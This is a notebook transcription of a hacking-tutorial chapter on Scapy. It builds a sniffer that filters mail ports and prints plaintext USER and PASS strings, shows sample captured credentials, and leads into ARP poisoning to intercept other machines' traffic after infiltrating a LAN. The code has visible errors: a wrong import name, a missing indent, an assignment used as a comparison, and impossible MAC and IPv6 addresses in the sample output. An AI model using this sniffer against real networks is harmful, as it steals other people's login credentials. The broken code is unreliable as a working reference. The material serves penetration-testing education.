<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C3-Owning_The_Network_With_Scapy/Stealing_Email_Credentials.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__Owning the network with Scapy__*

Occasionally, you run into such a well-thought-out, amazing Python library that even dedicating a whole chapter to it can't do it justice. Philippe Biondin has created such a library in the packet manipulation library __Scapy__. You just might finish this chapter and realize we made you do a lot of work in the previous two chapters to accomplish what you could have done with just one or two lines of Scapy.

Scapy is powerful and flexible, and its possibilities are almost infinite. We'll get a taste of things by sniffing traffic to steal plaintext email credentials and then __ARP poisoning__ a target machine on the network so that we can sniff their traffic. We'll wrap things up by extending Scapy's __pcap processing__ to carve out images from HTTP traffic and then perform facial detection on them to determine if there are humans present in the images.

We recommend that you use Scapy under a Linux system, as it was designed to work with Linux in mind. The newest version of Scapy does support Winzozz, but for the purpose of this chapter we will assume you are using your Kali virtual machine (__VM__) with a fully functioning Scapy installation. If you don't have Scapy, head on over to https://scapy.net/ to install it.

Now, suppose you have infiltrated a target's local area network (__LAN__). You can sniff the traffic on the local network with the techniques you'll learn in this chapter.

### *__Stealing Email Credentials__*

You've already spent some time getting into the nuts and bolts of sniffing in Python. Let's get to know Scapy's interface for sniffing packets and dissecting their contents. We'll build a very simple sniffer to capture Simple Mail Transport Protocol (__SMTP__), Post Office Protocol (__POP3__), and Internet Message Access Protocol (__IMAP__) credentials. Later, by coupling the sniffer with the Address Resolution Protocol (__ARP__) poisoning man-in-the-middle (__MITM__) attack, we can easily steal credentials from other machines on the network. This technique can, of course, be applied to any protocol, or to simply suck in all traffic and store it in a pcap file for analysis, which we will also demonstrate.

To get a feel for Scapy, let's start by building a skeleton sniffer that simply dissects and dumps out the packets. The aptly named __sniff__ function looks like the following:

In [ ]:
sniff(filter='', iface="any", prn=function, count=N)

The __filter__ parameter allows us to specify a Berkley Packet Filter (__BPF__) filter to the packets that Scapy sniffs, which can be left blank to sniff all packets. For example, to sniff all HTTP packets, you would use a BPF filter of _tcp port 80_. The __iface__ parameter tells the sniffer which network interface to sniff on, if it is left blank, Scapy will sniff on all interfaces. The __prn__ parameter specifies a callback function to be called for every packet tha matches the filter, and the callback function receives the packet object as its single parameter. The __count__ parameter specifies how many packets you want to sniff, if it is left blank, Scapy will sniff indefinitely.

Let's start by creating a simple sniffer that sniffs a packet and dumps its content. We'll then expand it to sniff only email-related commands. Crack open __mail_sniffer.py__ and jam out the following code:

In [ ]:
from scapy.all import sniff

def packet_callback(packet): #[1]
    print(packet.show())

def main():
    sniff(prn=packet_callback, count=1) #[2]

if __name__ == "__main__":
    main()

We start by defining the callback function that will receive each sniffed packet __[1]__ and then simply tell Scapy to start sniffing __[2]__ on all interfaces with no filtering. Now let's run the script, and you should see output similar to the following:
```
$ (bph) rick@kali:~/bhp/bhp$ sudo python mail_sniffer.py
###[ Ethernet ]###
 dst       = 42:26:19:ta:31:64
 src       = 00:0c:29:39:46:7e
 type      = IPv6
###[ IPv6 ]###
     version   = 6
     tc        = 0
     fl        = 661536
     plen      = 51
     nh        = UDP
     hlim      = 255
     src       = fe80::20c::29ff::fe39::467e
     dst       = fe80::1079:9d3f:d4a8:defb
###[ UDP ]###
        sport     = 42638
        dport     = domain
        len       = 51
        chksum    = 0xcf66
###[ DNS ]###
           id        = 22299
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###| DNS Question Record |###
            |  qname     = 'vortex.data.microsoft.com.'
            |  qtype     = A
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None
```
How incredibly easy was that! We can see that when the first packet was received on the network, the callback function used the built-in function __packet.show__ to display the packet contents and dissect some of the protocol information. Using __show__ is a great way to debug scripts as you are going along to make sure you are capturing the output you want.

Now that we have the basic sniffer running, let's apply a filter and add some logic to the callback function to peel out email-related authentication strings.

In the following example we'll use a packet filter so that the sniffer displays only the packets we're interested in. We'll use BPF syntax, also called _Wireshark style_, to do so. You'll encounter this syntax with tools like __tcpdump__, as well as in the packet capture filters used with __Wireshark__.

Let's cover the basic syntax of the BPF filter. There are three types of information you can use in your filter. You can specify a descriptor (like a specific host, interface, or port), the direction of traffic flow, and the protocol, as shown in __Table 4-1__. You can include or omit the type, direction, and protocol, depending on what you want to see in the sniffed packets.

<div align="center" width="100%">
<img src="https://github.com/damianiRiccardo90/BHP/blob/master/C3-Owning_The_Network_With_Scapy/BPF_Filter_Syntax.png?raw=true" alt="From Client to Server" width="50%">
<p style="text-align:center"><em><strong>Figure 4-1:</strong> BPF Filter Syntax</em></p>
</div>

For example, the expression _src 192.168.1.100_ specifies a filter that captures only packets originating on machine 192.168.1.100. The opposite filter is _dst 192.168.1.100_, which captures only packets with a destination of 192.168.1.100. Likewise, the expression _tcp port 110 or tcp port 25_ specifies a filter that will pass only TCP packets coming from or going to port 110 or 25. Now let's write a specific sniffer using BPF syntax in our example:

In [ ]:
from scapy.all import sniffer, TCP, IP

# The packet callback
def packet_callback(packet):
if packet[TCP].payload: #[1]
    mypacket = str(packet[TCP].payload)
    if "user" in mypacket.lower() or "pass" in mypacket.lower(): #[2]
        print(f"[*] Destination: {packet[IP].dst}")
        print(f"[*] {str(packet[TCP].payload)}") #[3]

def main():
    # Fire up the sniffer
    sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",
          prn=packet_callback, store=0) #[4]

if __name__ = "__main__":
    main()

Pretty straightforward stuff here. We changed the __sniff__ function to add a BPF filter that includes only the traffic destined for the common mail ports 110 (__POP3__), 143 (__IMAP__), and 25 (__SMTP__) __[4]__. We also used a new parameter called __store__, which, when set to 0, ensures that Scapy isn't keeping the packets in memory. It's a good idea to use this parameter if you intend to leave a long-term sniffer running, because then you won't be consuming vast amounts of RAM. When the callback function is called, we check to make sure it has a data payload __[1]__ and whether the payload contains the typical _USER_ or _PASS_ mail command __[2]__. If we detect an authentication string, we print out the server we are sending it to and the actual data bytes of the package __[3]__.

### *__Kicking the Tires__*

Here is some sample output from a dummy email account the authors attempted to connect a mail client to:
```
(bhp) root@kali:/home/rick/bhp/bhp# python mail_sniffer.py
[*] Destination: 192.168.1.207
[*] b'USER rick\n'
[*] Destination: 192.168.1.207
[*] b'PASS 1234567\n'
```
You can see that our mail client is attempting to log in to the server at 192.168.1.207 and send the plaintext credentials over the wire. This is a really simple example of how you can take a Scapy sniffing script and turn it into a useful tool during penentration tests. The script works for mail traffic because we designed the BPF filter to focus on the mail-related ports. You can change that filter to monitor other traffic. For example, change it to _tcp port 21_ to watch for __FTP__ connections and credentials.

Sniffing your own traffic might be fun, but it's always better to sniff with a friend, let's take a look at how you can perform an _ARP poisoning attack_ to sniff the traffic of a target machine on the same network.